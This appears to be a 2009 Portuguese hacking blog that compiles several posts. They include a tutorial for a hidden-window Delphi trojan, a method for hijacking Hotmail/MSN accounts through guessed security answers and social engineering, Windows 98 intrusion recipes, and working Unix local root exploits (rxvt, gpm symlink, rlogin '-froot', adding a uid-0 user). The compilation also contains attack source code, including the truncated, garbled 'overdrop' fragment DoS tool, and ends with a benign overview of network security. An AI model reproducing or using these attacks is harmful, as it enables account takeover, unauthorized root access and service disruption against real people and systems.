terça-feira, 4 de agosto de 2009

criar trojan no delphi

Bom galera, vou ensinar como fazer um trojan, em Delphi, mesmo se você baixou o Delphi ontem você vai conseguir fazer esse trojan… É assim… Este é um trojan básico…


1º Passo -> Você tem o Delphi? Se não, será necessário baixá-lo.
baixar delphi

2º Passo -> Abra o Delphi. Clique em Component, depois em vá em Install Packages…

Depois cliques em Add….

Em Filename coloque isso e depois clique em Open:

%programfiles%\Borland\Delphi7\Bin\dclsockets70.bpl

Ou o diretório do seu delphi + \Bin\dclsockets70.bpl. Isso serve para adicionar os componentes que serão necessarios para seu Trojan…

3º Passo -> Agora mãos a obra! Vá na paleta Standard e adicione 4 Buttons

Agora… insira um Edit que está na paleta Standard também


Depois insira um ClientSocket que está na paleta Internet.

Clique em um dos botões, e na parte esquerda, procure pela janela que o titulo é Object Inspector e depois procure por Caption.

E altere o conteudo da sua direita para Conectar, repita isso com os outros três botões, só que ao invés de colocar Conectar, coloque:
Desconectar, Abrir CD e Fechar CD.

Agora clique no Edit e vá na mesma janela anterior, só que dessa vez procure por Text. E remove o conteúdo da direita.

De uma arrumada na posição dos objetos a seu gosto… E lembresse, o Client Socket não vai aparecer… Eu arrumei assim:


4º Passo -> Agora que já fizemos a interface do Cliente, vamos codar! De dois cliques no botão Conectar. Abrirá uma nova janela, nela… escreva abaixo de begin isso:

ClientSocket1.Host := Edit1.Text;
ClientSocket1.Port := 1234;
ClientSocket1.Active := True;

Explicando… a primeira linha… vai definir o IP que você vai atacar, como o texto do edit que você inseriu, a segunda linha, vai definir como a porta a ser aberta, como 1234, e a terceira se conectará.

Agora vá a janela anterior… E de dois cliques no botão Desconectar, e coloque isso:

ClientSocket1.Active := False;
ClientSocket1.Close;

Explicando… a primeira linha… vai desconectar o Cliente do servidor, e a segunda… vai fechar o cliente.

Volte a janela anterior e dê dois cliques no botão Abrir CD, e coloque isso:

ClientSocket1.Socket.SendText('1');

Explicando… essa linha fará com que o Client Socket, envie o texto com o número 1 para o servidor, e lá, esse texto será reconhecido…

Volte novante a janela anterior, dê dois cliques no botão Fechar CD, e coloque isso:

ClientSocket1.Socket.SendText('2');

Explicando… ele faz a mesma coisa que o comando anterior, só que, ao invés de mandar um texto com o número 1 ele vai mandar um texto com o número 2.

Pronto cliente terminado,agora só falta o Server, então salve o programa clicando em File, depois em Save all e salve aonde você quiser.

Depois que salvar clique em Project depois Compile Project1

Depois clique em File, depois Close All

Clique em File, depois New, depois Application

Vá na paleta Internet e de dois cliques em ServerSocket

Agora de um clique nele, e vá na janela Object Inspector, e mude a Port para 1234

Agora, ainda na Object Inspector, mude o Active para True

Novamente em Object Inspector, clique em Events

Depois de dois cliques em OnClientRead


Na nova janela que apareceu, apague o begin e coloque isso:

var
Kingcaio : String;
begin
Kingcaio := Socket.ReceiveText;
if Kingcaio = '1' then
MciSendString('Set CdAudio Door Open',nil,0,Handle)
else if Kingcaio = '2' then
MciSendString('Set CdAudio Door Closed',nil,0,Handle);

Explicando… A 2ª linha vai definir a variante Kingcaio como uma string, a 4ª define a String Kingcaio como sendo igual a Socket.ReceiveText, que por sua vez significa ao texto recebido, a 5ª vai dizer tipo assim: “Se o texto recebido for igual a 1 faça isso, mas se não for siga em frente”, a 6ª é o comando para abrir o CD-ROM, a 7ª linha tem a mesma função que a 5ª linha, e por final a 8ª linha, é o comando para fechar o CD ROM.
Agora… ainda nessa janela suba a barra de rolagem até achar alguma coisa assim:

uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, ScktComp;

Logo após de ScktComp coloque MMSystem ficando igual a seguinte foto:

Certo… clique em Project depois em View Source, aparecerá uma nova janela, procure por Application.Initialize;, escreva logo abaixo dessa linha isto:

Application.ShowMainForm := False;

Que servirá para que a pessoa não veja a janela…

Agora clique em File e depois em Save All e salve em qualquer lugar…

Logo em seguida clique em Project em seguida Compile Project1.

Pronto! Acabou! Agora vamos testar para ver se deu certo! Dê dois cliques no executável do server, depois no executavel do cliente, no edit que você inseriu coloque isso:

127.0.0.1

Que é o endereço de LoopBack, ou seja, é a mesma coisa que se você digitasse seu próprio IP, e logo em seguida clique em Conectar, e teste os comandos… Deu certo? Acho que sim!

Espero que tenham gostado… Comentem!^^

hackear msn de gente burra

esse tutorial “ensina” como redefinir senhas do msn e hotmail, mas se você tiver QI suficiente pode usar em outros serviços.

1. Escolha seu alvo. Quanto mais você conhecer sobre a pessoa, mais fácil.
2. Entre no Hotmail e abra o link "esqueceu sua senha?"
3. Digite o endereço de email do alvo.
4. Escolha o link " Forneça as informações da conta e responda à sua pergunta secreta."
5. As perguntas possíveis são:
* Personagem de ficção favorito
* Personagem histórico favorito
* Livro/história infantil favorita
* Filme infantil favorito
* Comida de que você sempre gostou
* Seus dois melhores amigos de infância
* Programa de TV favorito que não passa mais
* Seu primeiro carro
* Primeira empresa em que você trabalhou
6. Abra o Orkut e procure pelo nome da pessoa.
7. Caso a pergunta da pessoa seja uma das que estão em negrito, o perfil dela no Orkut já dará a resposta.
8. Se não conseguir adivinhar, simplesmente pergunte para a pessoa. Adicione ela no MSN e comece uma dessas conversas "oi! de onde você é?" e vai aos poucos levando ela a falar sobre o assunto da pergunta. Como o assunto está muito mais ligado às experiência pessoais dela do que a uma questão de segurança, provavelmente ela dirá a resposta sem notar.
9. Se você conseguiu descobrir a resposta secreta, agora pode redefinir a senha e fazer o que bem entender com a conta.

Hoje em dia é que as perguntas não podem ser pessoais. Em tempos que seus dados estão disponíveis para qualquer um, esse sistema de perguntas ficou bastante falho.

Ex. Muitas pessoas colocam a pergunta: Seu time de futebol favorito. Basta ver as comunidades do indivíduo no Orkut pra descobrir. Ou mesmo chamar ele de Flamenguista pra ele se entregar no próprio MSN.

invadindo windows 98

Devido a um enorme número de Bugs, e uma capacidade de proteção que permite que qualquer pessoa invada um micro que utilize a rede Dial Up com uma conexão PPP, o Windows é um dos maiores motivos de piadas entre os portugueses, negros e o Rubinho Barriquelo. Mesmo que vc não esteja utilizando o compartilhamento de arquivos, qualquer pessoa pode invadir seu computador se vc estiver utilizando esse tipo de conexão.

Para esta "receita de bolo" funcionar, vc tem que estar usando a rede Dial Up e uma conexão PPP. Antes de tudo verifique se vc possui os drivers de clientes da microsof. Caso não estejam instalados, instale-os através do painel de controle no ícone redes. Verifique tb, se o compartilhamento de arquivos e impressoras está instalado

Configurar essas opçõesé simples. Vá ao Painel de Controle e abra Rede. Verifique as propriedades do protocolo TCP/IP. Alí você encontraráa opção para ativar a resolução WINS. No caso de você não conhecer nenhum servidor WINS, utilize 204.118.34.6 como primário e 204.118.34.11 como secundário. Esses servidores são dos USA, e gratuítos. Caso queira outros endereços, utilize um dos mecanismos de busca na Internet. Para configurar o LMHOSTS,você precisa criar um arquivo texto simples, utilizando-se até mesmo o Bloco de Notas do Windows. O arquivo criado deve chamar-se LMHOSTS. É nesse arquivo que ficarão os endereços de IP e osnomes dos computadores que você terá acesso. Para localizar um determinado computador, você digita o seu número de IP e a seguir seu NetBios, na mesma linha, separados por um espaço. Se você executar o programa NBSTSTAT, seguido da opção-N, você obterá essa lista, com o nome e o IP de seu computador sempre sendo o primeiro da lista, seguido das outras máquinas disponíveis,tudo numa janela DOS. Através do Explorer você poderá ver os computadores disponíveis na rede,dos quais você aindapoderá utilizar os discos mapeando-os, o que os tornará unidades de seu computador.

Invadindo pela porta 666

Para invadir é facil vc deve ter um programa de conexão via telenet (telnet q ja vem com o WIN95 ou similar) e também um programa chamado aabout. O q deve ser feito, este programa aabout deve ser acionado por ambas as parte (invasor e invadido) e o q ele faz?? Bem, ele abre uma porta de conexão entre os dois CPUs via a porta 666. Vc deve ligar o telenet colocar no rost o numero do IP da pessoa e em port deve-se colocar 666. Bem vc ja esta conectado, dai no login vc deve digita cg! (com o "!") e dar um dir vendo tudo o q tem no CPU da outra pessoa.

Invadindo pelo IP da vitíma

A invasão pôr IP pode ser feita de varias maneiras, aqui vai um jeito fácil de invadir sem ter q ficar fazendo mil coisas. Aqui vc aprenderá um meio de invadir pôr IP que só é garantido se vc e a pessoa a ser invadida estiverem o com o compartilhamento de dados ligado, e estiver entrando pela rede dial-up com a rede microsoft instalada.

Se vc não esta com a rede microsoft instalada e não sabe invadir, ai vai: Primeiro vá em meu computador, painel de controle, rede. Quando vc entrar na rede vai abrir uma caixa de comandos, veja lá se a rede microsoft esta instalada, se estiver instalada vá em logon principal da rede e escolha cliente para a rede microsoft , caso não esteja instalada, va em adicionar, na caixa va em cliente, depois em microsoft e escolha cliente p/ rede microsoft. Caso vc não ache esses nomes va em com disco precure lá.

Depois de instalado volte para o meu computador, vá acesso a rede dial-up e clique com o botão direito na conexão q vc faz. La vá em propiedades, tipo do servidor, configuração TCP/IP, e especificar o IP. Lá vc poe o Ip do cara q vc vai invadir. Dai é só reconectar, ir em explorando do windows, ambiente de rede, e toda a rede. Assim q vc clicar em toda a rede o CPU do cara aparecera la.

Lembresse q isso só dará certo se vc conectar via dial-up pelo Win95, ppp. Caso contrario não funcionara, e q também só dá certo se o compartilhamento de dados e impressão estiver ligado. É lógico q há maneiras de burlar isso, mas é perciso manjar de alguma lingugem. (vc pode fazer uma linha de comando no windows q vai até o compartilhamento e liga e passar esse programa para o cara dizendo q é outra coisa, o unico problema é q ele tem q reiniciar o CPU, mas ha modos para mudar isso também)

exploints

O que são exploits?

A palavra mesmo já dá uma idéia do que seja... explorar... explorar o que? Explorar vunerabilidades de sistemas, saca? Tipo, se existe um bug no Outlook Express que quando você manda uma msg, pra alguem que usa ele pra receber email, com o assunto (subject) com mais de 5000 caracteres ele trava, então fazem exploits ou voce mesmo pode fazer que explora essa vunerabilidade, saca... um exploit pode ser um programa ou mesmo só o codigo dele que voce pode compilar em seu computador. Compilar é pegar seu codigo fonte e faze-lo ficar executável... programação saca.... Para que servem? Vélho, pense assim, pô, se existe um erro, a gente pode explora-lo para beneficio próprio, saca. Tipo existia um erro num sendmail aí que você podia anexar a qualquer email o próprio arquivo de senhas do servidor, então fizeram um exploit para fazer isso com mais facilidade e muito mais êxito saca... com o exploit voce precisaria apenas falar pra que email era pra enviar o arquivo de senhas e o exploit fazia o resto... essa manha do sendmail já foi arrumada a um tempão viu.... existem muito erros em programas por aí que podemos exploita-los saca... "Regras!" Não é bem uma regra, porque essa não existe pra ser quebrada. Você pode usar vários exploits que existem por aí, mas nunca em benefício do mau saca. Voce não tem o direito de usar a porra de um exploit, q uma pessoa regaço os neuronios pra faze-lo, pra chegar e derrubar um site pra o seu encher de visitas. Esse não é a ideologia de quem faz exploits, eles existem pra denunciar as inseguranças, para que pessoas usem eles para fazerem algo de bom saca... Que tal você pegar e tranferir uma grana de um politico desses aí pra uma instituiçao dessas massa... o q acha. Não se esqueça de que usando apenas exploits você não estará fazendo um ataque completamente seu, a maioria do ataque foi feito pelo carinha q fez o exploit. Crie, nao copie! Onde econtra-los? Existe alguns sites que publicam exploits, e você mesmo pode publicar o seu neles. Tipo, tem a RootShell, que é estrangeiro, mas muito bom o site, apesar de tá fraquinho hoje em dia. Tem tb o a Securenet que é Brasileiro, e muito bom por sinal, vários exploits. Mais um pouco de exploits EXPLOIT Exploits locais são programas geralmente feitos em C que explorarm a vulnerabilidade de programas e sistemas para ganhar acesso root ( de administrador ) , 90% dos exploits são para sistemas Linux , os exploits locais são scripts em C que vc irá rodar no servidor a partir de uma shell adquirida , os exploits locais são os melhores de se usar , pela sua variedade e confiaça de acesso ( desde que voce saiba o que está fazendo ) , alguns possuem pequenos trojans para dar acesso ao seu desenvolvedor , o que acho importante de se saber C para vc não se dar mal , mais isso é bom pq ferra os Lahma tbm : ) . Existem varios tipos de exploits locais , uma infinidade , cada um com sua função e seu jeito de executar . O que vc vai fazer é basicamente o seguinte , voce irá copiar o exploit para o provedor de sua shell e depois compilar ele , para copiar voce usa um programa de FTP e para compilar voce irá usar o telnet , ( use o Linux nessa operação toda ), após ter copiado o exploit para a shell vamos compilar ele : Welcome to Linux 2.0.X Host Login : nirvana Password: Linux 2.0.X Host :~$ gcc -o exploit exploit.c

--------------------

1

Exploits locais são programas geralmente feitos em C que exploram a vulnerabilidade de programas e sistemas para ganhar acesso root ( de administrador ) , 90% dos exploits são para sistemas Linux , os exploits locais são scripts em C que você irá rodar no servidor a partir de uma shell adquirida , os exploits locais são os melhores de se usar , pela sua variedade e confiança de acesso ( desde que você saiba o que está fazendo ) , alguns possuem pequenos trojans para dar acesso ao seu programador .

Existem vários tipos de exploits locais , uma infinidade , cada um com sua função e seu jeito de executar . O que você vai fazer é basicamente o seguinte , você irá copiar o exploits para o provedor de sua shell e depois compilar ele , para copiar você usa um programa de FTP e para compilar você irá usar o telnet , ( use o Linux nessa operação toda ), após ter copiado o exploits para a shell vamos compilar ele :
Welcome to Linux 2.0.X

Host Login : nirvana
Password:
Linux 2.0.X

Host :~$ gcc -o exploits exploits.c < ----Compilando o Exploits.

Depois de compilado vamos rodá-lo para ganhar acesso root .

Host :~$ ./exploit <---Rodando o exploit no sistema.

Depois que você rodar o exploits vai aparecer uma série de Lixos , que geralmente são os Buffer Owerflows no sistema , ai logo surgirá o prompt root :

Host :~# <---Aqui tu ficou root no sistema , deu certo :) bah!!!

Agora você poderá acrescentar um usuário root para que não tenha que fazer toda essa merda de novo , você pode usar o adduser e depois colocar os 0:0 de root no passwd ou fazer diretamente pelo comando echo , o que acho mais confiável .

Host :~# echo newroot::0:1:Novo Root:/:bin/bash <<<---colocando usuário no passwd .

Se o sistema tiver shadow você acrescenta devida linha no shadow também , depois é só se logar novamente e fazer a festa . :)

Welcome to Linux 2.0.X

Host Login : newroot
Password:
Linux 2.0.X

Host :~#

ExploitS RemotoS
SecuritY

Os Exploits Remotos como já diz o próprio nome , são parecidos com os Exploits Locais , mais , não precisam de uma shell para Hackear na maquina a qual se quer Hackear , precisa é de uma base para rodá-lo , podendo ser um Linux e nunca um Windows , pois o programa é em C ou Perl e o RWindows não permite tal tarefa ; os exploits remotos exploram Bugs remotamente dando ao Hacker acesso privilegiado no sistema . O que você vai fazer é pegar o exploit , compilar ele no seu Linux e depois rodá-lo com o host ao qual vai atacar . As vulnerabilidades mais comuns usadas são as de BIND , FTP , IMAPD e POP . Você pode achar esses exploits na net , não colocarei eles aqui por motivo de segurança , ja que esta page é para fins educativos e de prevenção , e não escola de bunda mole :)

Usando o exploits :

Host :# gcc -o exploit exploit.c < ----Compilando o Exploit.
Host :# ./exploit
***************************
Exploit Remoto by Security Chaos
Use Exploit ./exploit host
***************************
Host :# ./exploit 127.0.0.1

Logo que na sua maioria ele der o buffer Owerflow remotamente no sistema ele te dará o prompt root e você poderá adicionar o seu user root .

--------------------

2

Exploitando:

1. Logue em um sistema qualquer que você tenha um account.

2. Digite no Shell:
$ echo 'cp /bin/sh /tmp/rxsh;chmod 4755 /tmp/rxsh' > /tmp/rxbug
$ chmod +x /tmp/rxbug
$ rxvt -print-pipe /tmp/rxbug
3. No rxvt xclient:
$ cat
ESC[5i
ESC[4i

4. $ /tmp/rxsh
# whoami
root
#

------------------------------------------------------------------------------

O problema do KILL MOUSE/STARTMOUSE, este comando esta na parte
dos pacotes DOOM em sistemas LINUX, ‚ só rodar estes dois scripts.

----------------------------------startmouse.sh

/usr/games/doom/startmouse.sh:
#!/bin/sh
if [ -r /tmp/gpmkilled ]; then
/usr/bin/grep gpm /etc/rc.d/rc.local > /tmp/gpmscript
/bin/sh /tmp/gpmscript; /bin/rm /tmp/gpmscript /tmp/gpmkilled
fi

----------------------------------startmouse.sh

----------------------------------killmouse.sh

/usr/games/doom/killmouse.sh:
#!/bin/sh
if /bin/ps ax | /usr/bin/grep -v grep | /usr/bin/grep "gpm" ; then
GPM_RUNNING=true; /bin/killall gpm; /bin/touch /tmp/gpmkilled
fi

----------------------------------killmouse.sh

$ touch /tmp/gpmkilled
$ /usr/games/doom/startmouse

ps -aux | grep gpm
bo 1436 0.0 2.0 40 312 v03 R 16:33 0:00 grep gpm
root 1407 0.0 2.4 42 368 ? S 16:24 0:00 /usr/bin/gpm t ms


$ umask 0
$ ln -s /root/.rhosts /tmp/gpmkilled
$ /usr/games/doom/killmouse
1407 ? S 0:00 gpm t ms

$ ls -l /root/.rhosts
-rw-rw-rw- 1 root users 0 Dec 13 16:44 /root/.rhosts

$ echo localhost bo > /root/.rhosts
$ rsh -l root localhost sh -i
bash#

------------------------------------------------------------------------------

Jaeger, abre a porta do cliente, sistema FBSD, ultrix e linux
by jaeger (jaeger@dhp.com)

begin prservice.c

------------------Corte aqui

/* modified by jaeger 12Nov1996. Duplicated slack coding style.



now takes

port locuser remuser [cmd]

port remuser passwd [cmd]

where port is the dst port you wish the stderr socket to connect to

from the server to the client machine.



/* generate ^@string1^@string2^@cmd^@ input to netcat, for scripting up

rsh/rexec attacks. Needs to be a prog because shells strip out nulls.



args:

locuser remuser [cmd]

remuser passwd [cmd]



cmd defaults to "pwd".



... whatever. _H*/



#include



/* change if you like; "id" is a good one for figuring out if you won too */

static char cmd[] = "pwd";



static char buf [256];



main(argc, argv)

int argc;

char * argv[];

{

register int x;

register int y = 0;

char * p;

char * q;



p = buf;

memset (buf, 0, 256);



if (! argv[1])

goto wrong;

x = strlen (argv[1]);

memcpy (p, argv[1], x); /* port plus null */

x++;

p += x;

y += x;



if (! argv[2])

goto wrong;

x = strlen (argv[2]);

memcpy (p, argv[2], x); /* second arg plus null */

x++;

p += x;

y += x;



if (! argv[3])

---------------------Corte aqui

------------------------------------------------------------------------------

Usuário pode pegar o passwd, sistema linux
by Zygo Blacell (zblaxell@MIRANDA.UWATERLOO.CA)

Em um diretório onde você possa escrever, entre nele e edita um
arquivo unlinkavel. O problema esta em lpr(1)não olhe os
diretorios com (eg. /tmp)

[ patch deleted]

D'oh! It doesn't. :(

Patheie o script e zaz daqui algums dias volte l e de um lpr-s

mkdir /tmp/foobar
ln -s /etc/passwd /tmp/foobar
lpr big_huge_file
lpr -r /tmp/foobar/passwd

rm -rf /tmp/foobar ; ln -s /etc /tmp/foobar

OU

ln -fs /home/private_file /tmp/foobar/passwd # Does this work?

/etc/passwd goes away.

------------------------------------------------------------------------------

Usuário loga como ROOT, sistema linux
by Ken Weaverling (weave@hopi.dtcc.edu)

Em alguns sistemas antigos de Linux existem um bug muito escroto,
onde ‚ so colocao alguns sinais que vc loga como ROOT...

No sistema Slackware 2.3/ kernel 1.2.13. ‚ só digitar quando vc
for logar pelo telnet...

'+::0:0:::'

Sacou ‚ isto mesmo ‚ s¢ digitar no password '+::0:0:::'

------------------------------------------------------------------------------

Rlogin, usuário loga como ROOT, sistema AIX e
Linux (Slackware 3.1, Redhat 2.0-2.1) autor desconhecido bug
retirado da ROOTSHELL

:
% rlogin haxored.net -l -froot
#

------------------------------------------------------------------------------

ip_fragment.c, não sei o que faz ainda não testei, sistema
Linux 2.0.33 remandado por Michal Zalewski


----------------------ip_fragment.c

if(len>65535)
{
- printk("Oversized IP packet from %s.\n", in_ntoa(qp->iph->saddr));
+ NETDEBUG(printk("Oversized IP packet from %s.\n", in_ntoa(qp->iph->saddr)));
ip_statistics.IpReasmFails++;
ip_free(qp);
return NULL;

-------------------------------------------------------------------------

// overdrop by lcamtuf [Linux 2.0.33 printk abuse]
// ------------------------------------------------
// based on (reaped from) teardrop by route|daemon9

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define IP_MF 0x2000
#define IPH 0x14
#define UDPH 0x8
#define PADDING 0x1c
#define MAGIC 0x3
#define COUNT 0xBEEF
#define FRAG2 0xFFFF

void usage(char *name) {
fprintf(stderr,"%s dst_ip [ -n how_many ] [ -s src_ip ] [ -x ] (use -x for express delivery).\n",name);
exit(0);
}

u_long name_resolve(char *host_name) {
struct in_addr addr;
struct hostent *host_ent;
if ((addr.s_addr=inet_addr(host_name))==-1) {
if (!(host_ent=gethostbyname(host_name))) return (0);
bcopy(host_ent->h_addr,(char *)&addr.s_addr,host_ent->h_length);
}
return (addr.s_addr);
}


void send_frags(int sock,u_long src_ip,u_long dst_ip,u_short src_prt,u_short dst_prt) {
u_char *packet=NULL,*p_ptr=NULL;
u_char byte;
struct sockaddr_in sin;
sin.sin_family=AF_INET;
sin.sin_port=src_prt;
sin.sin_addr.s_addr=dst_ip;
packet=(u_char *)malloc(IPH+UDPH+PADDING);
p_ptr=packet;
bzero((u_char *)p_ptr,IPH+UDPH+PADDING);
byte=0x45;
memcpy(p_ptr,&byte,sizeof(u_char));
p_ptr+=2;
*((u_short *)p_ptr)=htons(IPH+UDPH+PADDING);
p_ptr+=2;
*((u_short *)p_ptr)=htons(242);
p_ptr+=2;
*((u_short *)p_ptr)|=htons(IP_MF);
p_ptr+=2;
*((u_short *)p_ptr)=0x40;
byte=IPPROTO_UDP;
memcpy(p_ptr+1,&byte,sizeof(u_char));
p_ptr+=4;
*((u_long *)p_ptr)=src_ip;
p_ptr+=4;
*((u_long *)p_ptr)=dst_ip;
p_ptr+=4;
*((u_short *)p_ptr)=htons(src_prt);
p_ptr+=2;
*((u_short *)p_ptr)=htons(dst_prt);
p_ptr+=2;
*((u_short *)p_ptr)=htons(8+PADDING);
if (sendto(sock,packet,IPH+UDPH+PADDING,0,(struct sockaddr *)&sin,
sizeof(struct sockaddr))==-1) {
perror("\nsendto");
free(packet);
exit(1);
}
p_ptr=&packet[2];
*((u_short *)p_ptr)=htons(IPH+MAGIC+1);
p_ptr+=4;
*((u_short *)p_ptr)=htons(FRAG2);
if (sendto(sock,packet,IPH+MAGIC+1,0,(struct sockaddr *)&sin,
sizeof(struct sockaddr))==-1) {
perror("\nsendto");
free(packet);
exit(1);
}
free(packet);
}


int main(int argc, char **argv) {
int one=1,count=0,i,rip_sock,lag=500;
u_long src_ip=0,dst_ip=0;
u_short src_prt=0,dst_prt=0;
struct in_addr addr;
fprintf(stderr,"overdrop by lcamtuf [based on teardrop by route|daemon9]\n\n");
if((rip_sock=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))<0) {
perror("raw socket");
exit(1);
}
if (setsockopt(rip_sock,IPPROTO_IP,IP_HDRINCL,(char *)&one,sizeof(one))<0) {
perror("IP_HDRINCL");
exit(1);
}
if (argc < 2) usage(argv[0]);
if (!(dst_ip=name_resolve(argv[1]))) {
fprintf(stderr,"Can't resolve destination address.\n");
exit(1);
}
while ((i=getopt(argc,argv,"s:n:x"))!=EOF) {
switch (i) {
case 'n':
count = atoi(optarg);
break;
case 's':
if (!(src_ip=name_resolve(optarg))) {
fprintf(stderr,"Can't resolve source address.\n");
exit(1);
}
break;
case 'x':
lag=0;
break;
default:
usage(argv[0]);
break;
}
}
srandom((unsigned)(time((time_t)0)));
if (!count) count=COUNT;
fprintf(stderr,"Sending oversized packets:\nFrom: ");
if (!src_ip) fprintf(stderr," (random)"); else {
addr.s_addr = src_ip;
fprintf(stderr,"%15s",inet_ntoa(addr));
}
addr.s_addr = dst_ip;
fprintf(stderr,"\n To: %15s\n",inet_ntoa(addr));
fprintf(stderr," Amt: %5d\n",count);
fprintf(stderr,"[ ");
for (i=0;i<><><><><><><><><><><><><>

segurança

VISÃO GERAL

Uma ameaça consiste em uma possível violação da segurança de um sistema.
Algumas das principais ameaças às redes de computadores são:

- Destruição de informação ou de outros recursos.
- Modificação ou deturpação da informação.
- Roubo, remoção ou perda de informação de outros recursos.
- Revelação de informação
- Interrupção de serviços

As ameaças podem ser classificadas em: acidentais e intencionais ou ativas ou passiva.

- Acidentais -> Não estão associadas à intenção premeditada.
Ex.: Descuidos operacionais e bugs de software e hardware.

- Intencionais -> Variam desde a observação de dados com ferramentas simples de monitoramento
de redes, a ataques sofisticados baseados no conhecimento do funcionamento do sistema.
A realização de uma ameaça intencional configura um ataque.

- Passivas -> São as que, quando realizadas, não resultam em qualquer modificação nas informações contidas em um sistema,
em sua operação ou em seu estado.

Ex.: Uma estação que processa todos os quadros que recebe em uma rede local (inclusive os que não são a ela endereçados).

- Ativas -> Alteração da informação contida no sistema, ou modificações em seu estado ou operação.
Ex.: Uma estação de uma rede em anel que não retransmite mensagens quando deveria fazê-lo (ela não é a responsável pela retirada da mensagem do anel).

Como já foi mencionado, a materialização de uma ameaça intencional configura um ataque. Veja alguns dos principais:

· Personificação - Quando uma entidade faz-se passar por outra.
· Ataques internos - Ocorrem quando usuários legítimos comportam-se de modo não autorizado ou não esperado.
· Cavalos de tróia - Uma entidade executa funções não autorizadas, em adição às que está autorizada a executar.

POR QUÊ Segurança de Rede ?

O termo segurança é usado com o significado de minimizar a vulnerabilidade de bens
(qualquer coisa de valor) e recursos.
Vulnerabilidade é qualquer fraqueza que pode ser explorada para se violar um sistema
ou informações que ele contém.
A segurança está relacionada à necessidade de proteção contra o acesso ou manipulação,
intencional ou não, de informações confidenciais por elementos não autorizados, e a
utilização não autorizada do computador ou de seus dispositivos periféricos.
A necessidade de proteção deve ser definida em termos das possíveis ameaças e riscos
e dos objetivos de uma organização, formalizados nos termos de uma política de segurança.

POLITÍCAS DE SEGURANÇA

Uma política de segurança é um conjunto de leis, regras e práticas que regulam como uma organização gerencia,
protege e distribui suas informações e recursos.
um dado sistema é considerado seguro em relação a uma política de segurança, caso garanta o comprimento das leis,
regras e práticas definidas nessa política.
Uma política de segurança deve incluir regras detalhadas definindo como as informações e recursos da organização
deve ser manipulados ao longo do seu ciclo de vida, ou seja, desde o momento que passam a existir
no contexto da organização até quando deixam de existir. A política de segurança define o que é,
e o que não é permitido em termos de segurança, durante a operação de um dado sistema.
Uma política de segurança poderá ser denominada das seguintes formas:
· Política de Segurança baseada em regras -> Apóia-se em informações sobre sensibilidade, ou seja, em um sistema
seguro, os dados ou recursos devem ser marcados com rótulos de segurança
que indicam seu nível de sensibilidade.
· Política de Segurança baseada na identidade -> Representam o tipo de controle de acesso mais encontrado nos computadores atuais.
A base desse tipo de segurança é que um indivíduo, ou processo operando sob seu controle, pode especificar explicitamente os tipos de acesso que outros indivíduos podem Ter
às informações e recursos sob seu controle.


FORMAS DE SEGURANÇA

Uma política de segurança pode ser implementada com a utilização de vários mecanismos.
Nesta seção mostraremos alguns dos principais mecanismos de segurança adequados a ambientes de comunicação de dados.

CRIPTOGRAFIA - Surgiu da necessidade de se enviar informações sensíveis através de meios de comunicação não confiáveis, ou seja, em meios onde não é possível garantir que um intruso não irá interceptar o fluxo de dados para leitura (intruso passivo) ou para modificá-lo (intruso ativo). A forma de contornar esse problema é utilizar um método que modifique o texto original da mensagem a ser transmitida(texto normal), gerando texto criptografado na origem, através de um processo de codificação definido por um método de criptografia. O texto (ou a mensagem) criptografado é então transmitido e, no destino, o processo inverso ocorre, isto é, o método de criptografia é aplicado agora para decodificar o texto criptografado transformando-o no texto normal original, como mostra a figura abaixo:

Da forma como foi apresentado, sempre que um intruso conseguisse descobrir o método utilizado (quebrasse o código de criptografia), seria necessário substituir o método de criptografia. Essa substituição envolve o desenvolvimento e a instalação dos procedimentos que implementam o novo método, treinamento do pessoal envolvido etc. Esse revés levou ao desenvolvimento do modelo apresentado a seguir.
No modelo acima o texto criptografado, gerado a partir do texto normal, varia de acordo com a chave de codificação utilizada para o mesmo método de criptografia. Isto é, para um mesmo texto normal e um mesmo método de criptografia, chaves diferentes produzem textos criptografados diferentes. Assim o fato de um intruso conhecer o método de criptografia não é condição suficiente para que ele possa recuperar o texto original a partir do texto criptografado, pois, para recuperar o texto original corretamente, é necessário fornecer ao procedimento responsável pela decodificação, tanto o texto criptografado quanto a chave de decodificação.

Falaremos agora sobre alguns tipos de criptografia, salientando que existem outros :

· Criptografia com chave secreta -> Consiste em substituir as letras de uma mensagem pela terceira letra após sua posição no alfabeto (considerando o a como sucessor do z).
Uma generalização desse método seria substituir as letras pela n-ésima letra após sua posição no alfabeto. Nesse caso, o texto criptografado produzido para um mesmo texto normal vai variar de acordo com o valor de n, que é a chave utilizada nos procedimentos de codificação e decodificação do método.

· Criptografia com chave pública -> Baseia-se na utilização de chaves distintas: uma para a codificação (E) e outra para a decodificação (D), escolhidas de forma que a derivação de D a partir de E seja, em termos práticos, senão impossível, pelo menos muito difícil de ser realizada.

. Assinatura Digital - > Envolve dos procedimentos: assinatura de uma unidade de dados e verificação da assinatura em uma unidade de dados, ou seja, o primeiro procedimento baseia-se em informação privada (única e secreta) do signatário. O segundo utiliza informação pública para reconhecer a assinatura.
A característica essencial do mecanismo de assinatura digital é que ele deve garantir que uma mensagem assinada só pode Ter sido gerada com informações privadas do signatário. Portanto, uma vez verificada a assinatura com a chave pública, é possível posteriormente provar para um terceiro (juiz em um tribunal) que só o proprietário da chave privada poderia ter gerado a mensagem.

. Compromisso de Terceiro - > Baseia-se no conceito de um terceiro parceiro de confiança (uma espécie de tabelião ou notário) que atesta certas propriedades da informação intercambiada entre duas entidades, como sua origem, sua integridade, ou mesmo em que ela foi enviada ou recebida.

. Autenticação - > A escolha do mecanismo de autenticação apropriado depende do ambiente onde se dará a autenticação. Em uma primeira situação, os parceiros e os meios de comunicação são todos de confiança. Nesse caso, a identificação de uma entidade par pode ser confirmada por uma senha(password).
Cabe mencionar que as senhas não protegem contra uso mal intencionado. Autenticação mútua pode ser implementada com a utilização de uma senha distinta em cada direção da comunicação. Na Segunda situação, cada entidade confia em seu parceiro, porém não confia no meio de comunicação.
Nesse caso a proteção contra ataques pode ser fornecida com o emprego de métodos de criptografia, como por exemplo, utilização de chave pública. Na terceira situação, as entidades não confiam nos seus parceiros (ou sentem que não poderão confiar no futuro) nem no meio de comunicação. Nesse caso, deves ser usadas técnicas que impeçam que uma entidade negue que enviou ou recebeu uma unidade de dados.
Ou seja, devem ser empregados mecanismos de assinatura digital, ou mecanismos que envolvam o compromisso de um terceiro confiável (notarization).

